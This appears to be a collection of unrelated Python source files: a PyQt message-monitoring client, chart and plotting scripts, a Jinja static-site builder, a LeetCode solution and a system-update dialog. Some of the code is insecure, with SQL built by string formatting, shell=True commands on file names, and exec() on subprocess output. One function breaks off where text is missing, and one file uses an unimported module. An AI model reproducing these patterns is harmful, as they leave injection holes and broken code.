აბრუნებს მესიჯს გადაყვანილს ბაიტებში თავისი header-ით\n return message_bytes\n\n def send_registration_request_to_ies_monitoring_server(self, message):\n \"\"\" მიმდინარე ies_monitor-ის რეგისტრაცია ies_monitoring_server-ზე ხდება ip-ს და პორტის\n გაგზავნით. 
რეგისტრაციის მერე ies_monitoring_server-ი შეგვატყოვინებს ყველა ახალ\n შეტყობინებას \"\"\"\n\n connection = self.connect_ies_monitoring_server()\n\n # შევამოწმოთ სერვერთან კავშირი თუ დამყარდა\n if connection is False:\n logger.warning(\"რეგისტრაციის პაკეტის გასაგზავნად სერვერთან კავშირი ვერ დამყარდა\")\n return False\n\n logger.debug(\"სერვერთან კავშირი დამყარდა რეგისტრაციის პაკეტის გასაგზავნად\")\n\n # შეტყობინების გაგზავნა და ფუნქციის მნიშვნელობის დაბრუნება\n return self.send_message_to_ies_monitoring_server(message)\n\n def check_opened_messages(self):\n \"\"\" ვამოწმებთ წაკითხული შეტყობინებების ბაზას და ვუცვლით ფერს\n შესაბამის შეტყობინებას, პროგრამის გახსნისას \"\"\"\n\n self.select_message_id_sqlite()\n\n # ვამოწმებთ არის თუ არა შეტყობინების ID წაკითხული შეტყობინებების ბაზაში,\n # არსებობის შემთხვევაში შეტყობინებას ეცვლება ფონტი\n for row_index, row in enumerate(self.message_data):\n for col_index, col_name in enumerate(self.mysql_table_col_names):\n if row['message_id'] in self.get_id:\n font = QtGui.QFont()\n font.setBold(False)\n self.message_table.item(row_index, col_index).setFont(font)\n\n def connect_to_sqlite(self):\n \"\"\" ფუნქცია უკავშირდება წაკითხული შეტყობინებების ბაზას (sqlite) \"\"\"\n\n # უკავშირდება არსებულ sqlite ბაზას\n self.conn = sqlite3.connect('ies_monitor.db')\n\n # მონაცემების ლისტად წამოღება\n self.conn.row_factory = lambda cursor, rows: rows[0]\n\n self.sqlite_cursor = self.conn.cursor()\n\n def select_message_id_sqlite(self):\n \"\"\" ვკითხულობთ შეტყობინების ID -ს წაკითხული შეტყობინებების ბაზიდან \"\"\"\n\n self.sqlite_cursor.execute(\"SELECT message_id FROM opened_messages\")\n self.get_id = self.sqlite_cursor.fetchall()\n\n def insert_to_sqlite(self):\n \"\"\" ვწერთ გახსნილი შეტყობინების ID -ს sqlite ბაზაში,\n შეტყობინების ID -ები არ იწერება ხელმეორედ \"\"\"\n\n self.select_message_id_sqlite()\n if self.load_message['message_id'] in self.get_id:\n pass\n else:\n self.sqlite_cursor.execute(\n \"\"\"INSERT INTO \"opened_messages\" (\"message_id\",\"status\")\n VALUES ('{}','{}')\"\"\".format(self.load_message['message_id'], 1)\n )\n self.conn.commit()\n\n # self.sqlite_cursor.close() # ???\n # self.conn.close()\n\n def connect_to_mysql(self):\n \"\"\" ფუნქცია უკავშირდება Mysql სერვერს\"\"\"\n\n try:\n self.mysql_connection = pymysql.connect(\n mysql_server_ip,\n mysql_server_user,\n mysql_user_pass,\n mysql_database_name,\n port=mysql_server_port\n )\n logger.info(\"მონაცემთა ბაზასთან კავშირი დამყარებულია\")\n self.cursor = self.mysql_connection.cursor(pymysql.cursors.DictCursor)\n except Exception as ex:\n logger.warning(\"მონაცემთა ბაზასთან კავშირი წარუმატებელია\\n\" + str(ex))\n return False\n return self.cursor\n\n def set_qtablewidget_style(self):\n \"\"\" ფუნქცია აყენებს QTableWidgets -ის დიზაინის პარამეტრებს \"\"\"\n\n # self.message_table.setStyleSheet(\"QTableView {selection-background-color: #D98605;}\")\n # self.message_table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)\n # self.message_table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)\n\n # სვეტების რაოდენობა\n self.message_table.setColumnCount(len(self.mysql_table_col_names))\n\n # ვანიჭებთ სვეტებს შესაბამის სახელებს\n self.message_table.setHorizontalHeaderLabels(self.mysql_table_col_readable_names)\n self.message_table.setColumnHidden(4, True)\n self.message_table.setColumnHidden(0, True)\n # self.message_table.horizontalHeader().setStretchLastSection(True)\n self.message_table.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)\n 
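        # --- Illustrative aside (not part of the original source) ---
        # A minimal sketch of the HEADERSIZE message framing that
        # dictionary_message_to_bytes() and server_message_handler_thread()
        # implement above: the sender pickles a dict and prefixes it with a
        # fixed-width, space-padded byte count; the receiver reads the header
        # first, then loops until that many payload bytes have arrived.
        # The helper names (frame, recv_exact, unframe) are hypothetical and
        # shown only for clarity; the sketch is commented out so it does not
        # alter the behaviour of the surrounding method.
        #
        #   import pickle
        #
        #   HEADERSIZE = 10
        #
        #   def frame(message: dict) -> bytes:
        #       body = pickle.dumps(message)
        #       return bytes(str(len(body)).ljust(HEADERSIZE), 'utf-8') + body
        #
        #   def recv_exact(sock, n: int) -> bytes:
        #       buf = b''
        #       while len(buf) < n:
        #           chunk = sock.recv(n - len(buf))
        #           if not chunk:
        #               raise ConnectionError('socket closed mid-message')
        #           buf += chunk
        #       return buf
        #
        #   def unframe(sock) -> dict:
        #       length = int(recv_exact(sock, HEADERSIZE))
        #       return pickle.loads(recv_exact(sock, length))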
self.message_table.horizontalHeader().setSectionsMovable(True)\n\n def load_messages_from_mysql(self):\n \"\"\" mysql ბაზიდან კითხულობს შეტყობინებებს და სვავს message_table -ის შესაბამის სტრიქონში \"\"\"\n\n query = \"SELECT \" + \", \".join(self.mysql_table_col_names) + \" FROM messages\"\n self.cursor.execute(query)\n self.message_data = self.cursor.fetchall()\n self.mysql_connection.commit()\n self.message_table.setRowCount(0)\n for row_index, row in enumerate(self.message_data):\n self.message_table.insertRow(row_index)\n for col_index, col_name in enumerate(self.mysql_table_col_names):\n self.message_table.setItem(row_index, col_index,\n QtWidgets.QTableWidgetItem(str(row[col_name])))\n\n def message_table_double_click(self):\n \"\"\"\n ფუნქცია გამოიძახება სტრიქონზე მაუსის ორჯერ დაჭერისას.\n იძახებს dialog ფანჯარას და ავსებს მონიშნული შეტყობინების მონაცემებით,\n მონიშნული შეტყობინების ID -ს წერს წაკითხული შეტყობინებების ბაზაში (sqlite),\n უცვლის წაკითხულ შეტყობინებას ფერს.\n \"\"\"\n\n dialog = QtWidgets.QDialog()\n self.ui = Ui_Dialog()\n self.ui.setupUi(dialog)\n selected_row_index = []\n for idx in self.message_table.selectedIndexes():\n selected_row_index.append(idx.row())\n\n for row_index, row in enumerate(self.message_data):\n if row_index == selected_row_index[0]:\n self.load_message = row\n\n self.load_message_data()\n\n self.connect_to_sqlite()\n\n self.insert_to_sqlite()\n\n self.select_message_id_sqlite()\n\n font = QtGui.QFont()\n font.setBold(False)\n if self.load_message['message_id'] in self.get_id:\n for col_index, col_name in enumerate(self.mysql_table_col_names):\n self.message_table.item(selected_row_index[0], col_index).setFont(font)\n\n dialog.show()\n dialog.exec_()\n\n def load_message_data(self):\n \"\"\" ფუნქცია ავსებს dialog ფანჯარას შეტყობინების მონაცემებით \"\"\"\n\n self.ui.message_title.setText(self.load_message['message_title'])\n self.ui.message_id.setText(self.load_message['message_id'])\n self.ui.message_type.setText(self.load_message['message_type'])\n self.ui.client_ip.setText(self.load_message['client_ip'])\n self.ui.message_time.setText(str(self.load_message['sent_message_datetime']))\n self.ui.script_name.setText(self.load_message['client_script_name'])\n self.ui.text.setPlainText(self.load_message['text'])\n\n def closeEvent(self, event):\n \"\"\" ფუნქცია გამოიძახება პროგრამის დახურვის დროს \"\"\"\n\n close = QtWidgets.QMessageBox.question(\n self,\n \"QUIT\",\n \"Sure?\",\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No\n )\n\n if close == QtWidgets.QMessageBox.Yes:\n self.application_is_closing = True\n self.connection_close(self.listener_socket)\n event.accept()\n else:\n event.ignore()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n main_window = MainWindow()\n main_window.show()\n os._exit(app.exec_()) # ???!!!!!!!!!!!\n","sub_path":"ies_monitor.py","file_name":"ies_monitor.py","file_ext":"py","file_size_in_byte":54588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"293934802","text":"from pyecharts import options as opts\nfrom pyecharts.charts import Pie\nfrom pyecharts.faker import Faker\n\nc = (\n Pie()\n .add(\n \"\",\n [\n list(z)\n for z in zip(\n Faker.choose() + Faker.choose() + Faker.choose(),\n Faker.values() + Faker.values() + Faker.values(),\n )\n ],\n center=[\"40%\", \"50%\"],\n )\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"Pie-Legend 滚动\"),\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"80%\", 
orient=\"vertical\"),\n )\n .set_series_opts(label_opts=opts.LabelOpts(formatter=\"{b}: {c}\"))\n .render(\"pie_scroll_legend.html\")\n)\n","sub_path":"Pie/pie_scroll_legend.py","file_name":"pie_scroll_legend.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"130847247","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, print_function\nimport sys\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef avg_wave_of_freqs(freqs, x_cnt=0, x_max=0):\n if (x_cnt == 0):\n x_cnt = len(freqs)*2\n if(x_max == 0):\n x_max = freqs[-1]*50\n\n x = np.linspace(0, x_max, x_cnt)\n\n freqs_cnt = len(freqs)\n avg_of_waves = sum(map(lambda freq: np.sin(x/freq), freqs))\n return x, avg_of_waves/freqs_cnt\n\n\ndef plt_wave(x, avg_wave, wave_cnt):\n plt.plot(x, avg_wave)\n plt.xlabel('x')\n plt.ylabel('Avg of {} waves'.format(wave_cnt))\n plt.axis('tight')\n\n\ndef plt_avg(freqs, x_cnt=0, x_max=0):\n # Inverse\n freqs = np.array(freqs)\n x_cnt = 10000\n x_max = 100\n freqs = 1 / freqs\n x, avg_of_waves = avg_wave_of_freqs(freqs, x_cnt=x_cnt, x_max=x_max)\n plt_wave(x, avg_of_waves, len(freqs))\n\n\ndef main():\n pn_fname = os.path.join(os.path.dirname(__file__), 'prime-numbers.txt')\n with open(pn_fname, 'r') as f:\n pns = np.array(list(map(int, f.readlines())))\n # pns = pns[:5000]\n print('Using {} prime numbers (Largest: {})'.format(len(pns), pns[-1]))\n sys.stdout.flush()\n\n # plt.subplot(2, 2, 1)\n plt.title('Prime numbers')\n plt_avg(pns, x_cnt=20000, x_max=pns[-1]*40)\n\n # plt.subplot(2, 2, 2)\n # plt.title('Natural numbers')\n # plt_avg(list(range(2, pns[-1])), x_cnt=20000, x_max=pns[-1]*40)\n\n # non_pns = list(filter(lambda k: k not in pns, range(\n # 1, pns[-1])))\n # plt.subplot(2, 2, 3)\n # plt.title('non-primes')\n # plt_avg(non_pns, x_cnt=20000, x_max=pns[-1]*40)\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"post/study/math/prime-number/prime_wave_simple.py","file_name":"prime_wave_simple.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"648482881","text":"#!/usr/bin/env python3\n# Requires the following pip packages:\n# python-dateutil, jinja2\n\nimport json, os, subprocess, jsonpickle\nimport re\n\nimport dateutil.parser, jinja2, joblib, PIL.Image, pygments\nimport xml.etree.ElementTree as ElementTree\nimport jinja2.ext\nfrom jinja2 import Environment, PackageLoader, ChoiceLoader, FileSystemLoader, StrictUndefined\nfrom jinja2.utils import Namespace\nfrom urllib.parse import urlsplit\nfrom pygments.lexers import guess_lexer, get_lexer_by_name\nfrom pygments.formatters import HtmlFormatter\n\n\nCONFIG_PATH = \"../build/config.json\"\n# Directory in which Jinja2 templates are stored\nTEMPLATE_DIR=\"templates\"\n\nIMG_EXTENSIONS = \".gif\", \".jpg\", \".jpeg\", \".png\", \".svg\"\nVID_EXTENSIONS = \".webm\",\nSND_EXTENSIONS = \".ogg\",\n# Anything visual\nGFX_EXTENSIONS = IMG_EXTENSIONS + VID_EXTENSIONS\nFONT_EXTENSIONS = \".eot\", \".ttf\", \".woff\", \".woff2\"\nCSS_EXTENSIONS = \".css\",\n\n# Config file read from .json on disk\nconfig = json.loads(open(CONFIG_PATH, \"r\").read())\n\npersistent = joblib.Memory(cachedir=\"../build/joblib\", verbose=0)\n\ndef get_ext(path):\n \"\"\"Return the extension of a filename.\n Example:\n >>> get_ext(\"my/name/is/pinkie.pie\")\n \".pie\"\n \"\"\"\n return 
os.path.splitext(path)[1]\n\ndef highlight_code(code, filetype=None):\n if filetype:\n lexer = get_lexer_by_name(filetype)\n else:\n lexer = guess_lexer(code)\n return pygments.highlight(code, lexer, HtmlFormatter())\ndef get_highlight_css():\n \"\"\"Return the CSS needed to perform syntax highlighting\"\"\"\n return HtmlFormatter().get_style_defs('.highlight')\n\ndef filter_into_tag(value):\n \"\"\"Given some text, this returns a human-readable tag that closely\n corresponds to the text but is safe to use in a URL.\n Example:\n >>> filter_into_tag(\"Hello, This is Arnold\")\n \"hello-this-is-arnold\"\n \"\"\"\n valid = 'abcdefghijklmnopqrstuvwxyz0123456789'\n # Make lowercase and replace illegal chars with hyphens\n value = \"\".join([c if c in valid else '-' for c in value.lower()])\n # Squash pairs of hyphens\n while len(value) != len(value.replace(\"--\", \"-\")):\n value = value.replace(\"--\", \"-\")\n\n return value\n\ndef filter_friendly_date(date):\n \"\"\"Takes a datetime.datetime object, returns a friendly version of the date, e.g. 'Jan 22, 2015'\"\"\"\n return date.strftime(\"%b %d, %Y\")\n\ndef filter_detailed_date(date):\n \"\"\"Takes a datetime.datetime object, returns a detailed version of the date, e.g. 'Jan 22, 2015 at 8:09 PM PST'\"\"\"\n return date.strftime(\"%b %d, %Y at %I:%M %p PST\")\n\ndef filter_drop_null_values(dict):\n \"\"\"Returns a new dict that contains only the items for which bool(item.value) == True\n Example:\n >>> filter_drop_null_values(dict(x=2, y=None, z=\"\", k=\"yes\", j=\"False\"))\n dict(x=2, k=\"yes\", j=\"False\")\n \"\"\"\n\n filt = {}\n for k, v in dict.items():\n if v:\n filt[k] = v\n return filt\n\ndef filter_url_with_args(path, **kwargs):\n \"\"\"Returns `path` + \"?\" + urlencode(kwargs),\n or just `path` if there are no kwargs\n \"\"\"\n urlargs = \"?\" + jinja2.filters.do_urlencode(kwargs) if kwargs else \"\"\n return path + urlargs\n\n@persistent.cache\ndef filter_tex_to_svg(tex):\n \"\"\"Convert LaTeX into an inline svg.\n e.g. \"e=mc^2\"|tex\n \"\"\"\n # Note: we prepend a space to fix bug in tex2svg when input is a number or starts with '-'\n tex = subprocess.Popen([\"tex2svg\", \"--inline\", \" \" + tex], stdout=subprocess.PIPE)\n res = subprocess.check_output([\"scour\", \"-q\", \"-p\" \"10\",\n \"--strip-xml-prolog\",\n \"--enable-comment-stripping\",\n \"--enable-id-stripping\",\n \"--create-groups\",\n ], stdin=tex.stdout)\n res = res.decode().strip()\n if not \"\" %self.src_filename\n \n @property\n def intermediate_path(self):\n # TODO: this should be passed via CLI\n return self.src_filename \\\n .replace(\".html.jinja.html\", \".html\") \\\n .replace(\".css.jinja.css\", \".css\") \\\n .replace(\".src.bin\", \"\")\n\n @property\n def intermediate_dir(self):\n return os.path.dirname(self.intermediate_path)\n\n @property\n def build_path(self):\n return self.intermediate_path \\\n .replace(config[\"build\"][\"intermediate\"], config[\"build\"][\"output\"])\n\n @property\n def base_src_info(self):\n \"\"\" Return the src_info common to all pages,\n sometimes unpopulated. 
\"\"\"\n # If there's info associated with the source, provide that, too.\n try:\n src_srcinfo = jsonpickle.decode(open(self.src_srcinfo_file).read())\n except FileNotFoundError:\n src_srcinfo = {}\n\n return dict(\n intermediate_src_path = self.src_filename,\n intermediate_path = self.intermediate_path,\n build_path = self.build_path,\n rtdeps = set(),\n srcdeps = set(),\n **src_srcinfo,\n )\n @property\n def base_build_info(self):\n \"\"\" Return the build common to all pages\n \"\"\"\n return dict(\n intermediate_path = self.intermediate_path,\n build_path = self.build_path,\n anchors = set(),\n )\n\n def get_build(self):\n \"\"\" Default build rule for POD files \"\"\"\n build = self.base_build_info\n build['rtdeps'] = set()\n build['content'] = \\\n open(self.src_filename, 'rb').read()\n return build\n\nclass JinjaPage(Page):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def _get_jinja_env(self, do_render=False):\n global config\n\n src_info = Namespace(\n title = \"\",\n desc = \"\",\n comments = dict(),\n page_type = Page,\n anchors = set(),\n **self.base_src_info\n )\n\n def to_build_path(abs_path):\n # TODO: result should be an absolute/canonical path!\n return abs_path.replace(config['build']['intermediate'],\n config['build']['output'])\n def path_from_root(path):\n \"\"\" Treat `path' as a path relative to the intermediate root.\n \"\"\"\n return os.path.join(config['build']['intermediate'], path)\n def path_from_here(path):\n \"\"\" Treat `path' as a path relative to the current folder\n \"\"\"\n return os.path.join(self.intermediate_dir, path)\n\n def to_rel_path(abs_path):\n #build_root = config[\"build\"][\"output\"] + \"/\"\n #if abs_path.startswith(build_root):\n # abs_path = abs_path[len(build_root):]\n # Separate the anchor, if it was provided\n if \"#\" in abs_path:\n abs_path, anchor = abs_path.split(\"#\")\n else:\n anchor = \"\"\n # Remove any stem that is common to (abs_path, build_path).\n if abs_path.startswith(config['build']['output']):\n parts_out, parts_abs = src_info.build_path.split(\"/\"), abs_path.split(\"/\")\n else:\n parts_out, parts_abs = src_info.intermediate_path.split(\"/\"), abs_path.split(\"/\")\n while parts_out and parts_abs and parts_out[0] == parts_abs[0]:\n del parts_out[0]\n del parts_abs[0]\n \n # add necessary ../ parents\n prefix = \"../\"*(len(parts_out)-1)\n # Add the leaf\n base = os.path.join(prefix, \"/\".join(parts_abs))\n # Remove index.html from the path if configured to.\n if base.endswith(\"index.html\") and config[\"omit_index_from_url\"]:\n base = base[:-len(\"index.html\")]\n # Re-add the anchor, if there was one\n retstr = \"#\".join((base, anchor)) if anchor else base\n if retstr == \"\":\n # old web browsers misinterpret empty href. 
See http://stackoverflow.com/questions/5637969/is-an-empty-href-valid\n retstr = \"#\"\n return retstr\n\n def get_srcinfo(pg):\n nonlocal src_info\n basedir = os.path.dirname(self.src_filename)\n full_path = os.path.join(basedir, pg) + \".srcinfo\"\n src_info.srcdeps.add(full_path)\n if do_render:\n # load the page info\n info = jsonpickle.decode(open(full_path).read())\n return info\n\n def get_resource(pg):\n nonlocal src_info\n basedir = os.path.dirname(self.src_filename)\n full_path = os.path.join(basedir, pg) + \".build\"\n src_info.srcdeps.add(full_path)\n if do_render:\n # load the page info\n info = jsonpickle.decode(open(full_path).read())\n return info\n\n\n env = Environment(trim_blocks=True, lstrip_blocks=True, undefined=StrictUndefined,\n extensions=[jinja2.ext.do],\n loader=ChoiceLoader([\n PackageLoader(\"__main__\", TEMPLATE_DIR),\n FileSystemLoader(\"/\")\n ]))\n\n # Populate template global variables & filters\n env.globals.update(config)\n env.globals[\"do_render\"] = do_render\n env.globals[\"config\"] = config\n env.globals[\"get_srcinfo\"] = get_srcinfo\n # TODO: replace with get_resource\n env.globals[\"get_page\"] = get_resource\n env.globals[\"get_image\"] = get_srcinfo\n env.globals[\"get_audio\"] = get_srcinfo\n env.filters[\"into_tag\"] = filter_into_tag\n env.filters[\"friendly_date\"] = filter_friendly_date\n env.filters[\"highlight_code\"] = highlight_code\n env.filters[\"detailed_date\"] = filter_detailed_date\n env.filters[\"drop_null_values\"] = filter_drop_null_values\n env.filters[\"url_with_args\"] = filter_url_with_args\n env.filters[\"unique\"] = filter_unique\n env.filters[\"tex\"] = filter_tex_to_svg\n env.filters[\"to_rel_path\"] = to_rel_path\n env.filters[\"to_build_path\"] = to_build_path\n env.filters[\"path_from_root\"] = path_from_root\n env.filters[\"path_from_here\"] = path_from_here\n env.globals[\"get_highlight_css\"] = get_highlight_css\n # Expose these types for passing to the `page.set_type` macro\n env.globals[\"BlogEntry\"] = BlogEntry\n env.globals[\"HomePage\"] = HomePage\n env.globals[\"AboutPage\"] = AboutPage\n env.globals[\"Page\"] = Page\n env.globals['page_info'] = src_info\n\n return env, src_info._Namespace__attrs\n\n def get_rendered_jinja(self, do_render):\n env, jinja_info = self._get_jinja_env(do_render=do_render)\n\n template = env.get_template(self.src_filename)\n rendered = template.render().strip()\n # Don't rely on self!\n jinja_info['srcdeps'].discard(self.intermediate_path)\n jinja_info['rtdeps'].discard(self.intermediate_path)\n jinja_info['rtdeps'].discard(self.build_path)\n \n return jinja_info, rendered\n\n\n def get_build(self):\n \"\"\" Render a .jinja.html page to html. 
\"\"\"\n jinja_info, rendered = self.get_rendered_jinja(do_render=True)\n\n build = self.base_build_info\n build['content'] = rendered\n build['rtdeps'] = jinja_info['rtdeps']\n build['anchors'] = jinja_info['anchors']\n\n return build\n\n def get_src_info(self):\n src_info, _rendered = self.get_rendered_jinja(do_render=False)\n return src_info\n\n\n\nclass Image(Page):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n @property\n def size(self):\n \"\"\"Returns the size of the image in pixels (width, height)\"\"\"\n if get_ext(self.intermediate_path) == \".svg\":\n # PIL doesn't support SVG.\n # Instead, parse as XML.\n # Width and Height are stored as attributes on the root SVG element.\n tree = ElementTree.parse(self.src_filename)\n root = tree.getroot()\n width = int(float(root.attrib[\"width\"].replace(\"pt\", \"\").replace(\"mm\", \"\")))\n height = int(float(root.attrib[\"height\"].replace(\"pt\", \"\").replace(\"mm\", \"\")))\n return (width, height)\n elif get_ext(self.intermediate_path) in VID_EXTENSIONS:\n cmd = \"ffprobe -show_entries stream=height,width -v error -of flat=s=_ %s\" %self.src_filename\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output = p.communicate()\n video_vars = {}\n for line in output:\n exec(line, video_vars)\n return int(video_vars[\"streams_stream_0_width\"]), int(video_vars[\"streams_stream_0_height\"])\n else:\n im = PIL.Image.open(self.src_filename)\n return im.size\n\n def get_src_info(self):\n src_info = self.base_src_info\n src_info['size'] = self.size\n return src_info\n\n\n #@property\n #def rasterized(self):\n # \"\"\"Return an Image object for a rasterized version of this image.\n # For non-vector graphics, this is a noop.\n # \"\"\"\n # if self.path_on_disk.endswith(\".svg\"):\n # return Image(path_on_disk=self.path_in_build_tree[:-4] + \".png\", need_exist=False)\n # else:\n # return self\n\nclass BinaryBlob(Page):\n def get_src_info(self):\n return self.base_src_info\n\nclass Author(object):\n def __init__(self, name):\n self.name = name\n def __eq__(self, other):\n return self.name == other.name\n def __hash__(self):\n return hash(self.name)\n\nclass BlogEntry(Page):\n do_render_with_jinja = True\n\nclass HomePage(Page):\n do_render_with_jinja = True\n\nclass AboutPage(Page):\n do_render_with_jinja = True\n\n","sub_path":"src/page_info.py","file_name":"page_info.py","file_ext":"py","file_size_in_byte":14753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"640723855","text":"# https://leetcode.com/problems/permutations/\n\nclass Solution(object):\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n res = []\n def permutation(nums, l, r):\n if l == r:\n res.append(nums)\n else:\n for i in range(l, len(nums)):\n new_nums = copy.deepcopy(nums)\n new_nums[l], new_nums[i] = new_nums[i], new_nums[l]\n permutation(new_nums, l + 1, r)\n permutation(nums, 0, len(nums) - 1)\n return res\n \n\n\n","sub_path":"leetcode/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"405320985","text":"\n# 輸入處方 2018.06.15\n#coding: utf-8\n\nfrom PyQt5 import QtWidgets, QtCore\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox, QPushButton\n\nimport urllib.request\nfrom threading import Thread\nfrom queue import Queue\n\nimport os.path\nfrom os import listdir\nimport 
ntpath\nimport shutil\nimport datetime\n\nfrom classes import table_widget\nfrom libs import ui_utils\nfrom libs import system_utils\nfrom libs import string_utils\n\n\n# 醫療系統更新\nclass SystemUpdate(QtWidgets.QDialog):\n # 初始化\n def __init__(self, parent=None, *args):\n super(SystemUpdate, self).__init__(parent)\n self.parent = parent\n self.database = args[0]\n self.system_settings = args[1]\n\n self.ui = None\n\n self._set_ui()\n self._set_signal()\n\n # 解構\n def __del__(self):\n self.close_all()\n\n # 關閉G\n def close_all(self):\n pass\n\n # 設定GUI\n def _set_ui(self):\n self.ui = ui_utils.load_ui_file(ui_utils.UI_SYSTEM_UPDATE, self)\n self.setFixedSize(self.size()) # non resizable dialog\n system_utils.set_css(self, self.system_settings)\n system_utils.center_window(self)\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setText('開始更新')\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Cancel).setText('取消')\n self.ui.toolButton_open_file.clicked.connect(self._open_file)\n self.ui.lineEdit_file_name.textChanged.connect(self._file_name_changed)\n\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False)\n\n self.table_widget_file_list = table_widget.TableWidget(self.ui.tableWidget_file_list, self.database)\n self._set_table_width()\n\n self._set_radio_buttons()\n self.ui.lineEdit_file_name.setFocus()\n\n # 設定信號\n def _set_signal(self):\n self.ui.buttonBox.accepted.connect(self.accepted_button_clicked)\n self.ui.radioButton_auto_update.clicked.connect(self._set_radio_buttons)\n self.ui.radioButton_manual_update.clicked.connect(self._set_radio_buttons)\n self.ui.pushButton_download.clicked.connect(self._check_downloaded_file)\n\n def _set_radio_buttons(self):\n self.ui.pushButton_download.setEnabled(False)\n self.ui.lineEdit_file_name.setEnabled(False)\n self.ui.toolButton_open_file.setEnabled(False)\n\n if self.ui.radioButton_auto_update.isChecked():\n self.ui.pushButton_download.setEnabled(True)\n else:\n self.ui.lineEdit_file_name.setEnabled(True)\n self.ui.toolButton_open_file.setEnabled(True)\n\n def _set_table_width(self):\n width = [200, 220, 350, 200]\n self.table_widget_file_list.set_table_heading_width(width)\n\n def _open_file(self):\n options = QFileDialog.Options()\n\n fileName, _ = QFileDialog.getOpenFileName(self,\n \"開啟更新檔\", '*.zip',\n \"zip 壓縮檔 (*.zip);;Text Files (*.txt)\", options = options)\n if fileName:\n self.ui.lineEdit_file_name.setText(fileName)\n\n def _file_name_changed(self):\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False)\n\n file_name = self.ui.lineEdit_file_name.text()\n if file_name == '':\n return\n\n if not os.path.isfile(file_name):\n return\n\n zip_file_name = self.ui.lineEdit_file_name.text()\n self._check_files(zip_file_name)\n\n def accepted_button_clicked(self):\n self._update_files()\n\n msg_box = QMessageBox()\n msg_box.setIcon(QMessageBox.Information)\n msg_box.setWindowTitle('系統更新完成')\n msg_box.setText(\"恭喜您! 
系統已更新至最新檔, 系統檔案全部更新成功.\")\n msg_box.setInformativeText(\"為了讓更新檔生效, 即將重新啟動醫療系統.\")\n msg_box.addButton(QPushButton(\"確定\"), QMessageBox.YesRole)\n msg_box.exec_()\n\n self.parent.restart_pymedical()\n\n def _check_files(self, zip_file_name):\n dest_root = os.path.dirname(os.path.abspath(__file__))\n\n temp_dir = os.path.join(dest_root, '_temp')\n if os.path.exists(temp_dir):\n shutil.rmtree(temp_dir)\n\n os.mkdir(temp_dir)\n system_utils.unzip_file(zip_file_name, temp_dir)\n\n zip_dir = ntpath.basename(zip_file_name).split('.')[0]\n\n zip_source_root = os.path.join(temp_dir, zip_dir)\n\n self.ui.tableWidget_file_list.setRowCount(0)\n\n self._list_files(zip_source_root, dest_root, '')\n self._list_files(zip_source_root, dest_root, 'classes')\n self._list_files(zip_source_root, dest_root, 'convert')\n self._list_files(zip_source_root, dest_root, 'css')\n self._list_files(zip_source_root, dest_root, 'dialog')\n self._list_files(zip_source_root, dest_root, 'libs')\n self._list_files(zip_source_root, dest_root, 'mysql')\n self._list_files(zip_source_root, dest_root, 'printer')\n self._list_files(zip_source_root, dest_root, 'ui')\n self._list_files(zip_source_root, dest_root, 'images')\n\n self.ui.tableWidget_file_list.resizeRowsToContents()\n\n if self.ui.tableWidget_file_list.rowCount() <= 0:\n msg_box = QMessageBox()\n msg_box.setIcon(QMessageBox.Warning)\n msg_box.setWindowTitle('系統更新完成')\n msg_box.setText(\"經過檢查更新檔案, 發現系統已經是最新檔, 不需更新.\")\n msg_box.setInformativeText(\"請按取消鍵結束系統更新.\")\n msg_box.addButton(QPushButton(\"確定\"), QMessageBox.YesRole)\n msg_box.exec_()\n return\n\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(True)\n\n def _list_files(self, zip_source_root, dest_root, dir_name):\n source_dir = os.path.join(zip_source_root, dir_name)\n dest_dir = os.path.join(dest_root, dir_name)\n\n source_files = [f for f in listdir(source_dir) if os.path.isfile(os.path.join(source_dir, f))]\n\n for file in source_files:\n source_file_name = file\n source_file_date = datetime.datetime.fromtimestamp(\n self.creation_date(os.path.join(source_dir, source_file_name))\n )\n row = [source_file_name, source_dir, dest_dir, source_file_date]\n\n dest_file_name = os.path.join(dest_dir, source_file_name)\n if not os.path.isfile(dest_file_name):\n self._add_list(row)\n continue\n\n dest_file_date = datetime.datetime.fromtimestamp(\n self.creation_date(os.path.join(dest_dir, dest_file_name))\n )\n if source_file_date > dest_file_date:\n self._add_list(row)\n\n def _add_list(self, row):\n row_no = self.ui.tableWidget_file_list.rowCount()\n self.ui.tableWidget_file_list.setRowCount(row_no + 1)\n\n for column in range(len(row)):\n self.ui.tableWidget_file_list.setItem(\n row_no, column,\n QtWidgets.QTableWidgetItem(string_utils.xstr(row[column]))\n )\n\n def creation_date(self, file_name):\n # if sys.platform == 'win32':\n # return os.path.getctime(file_name)\n # else:\n # return 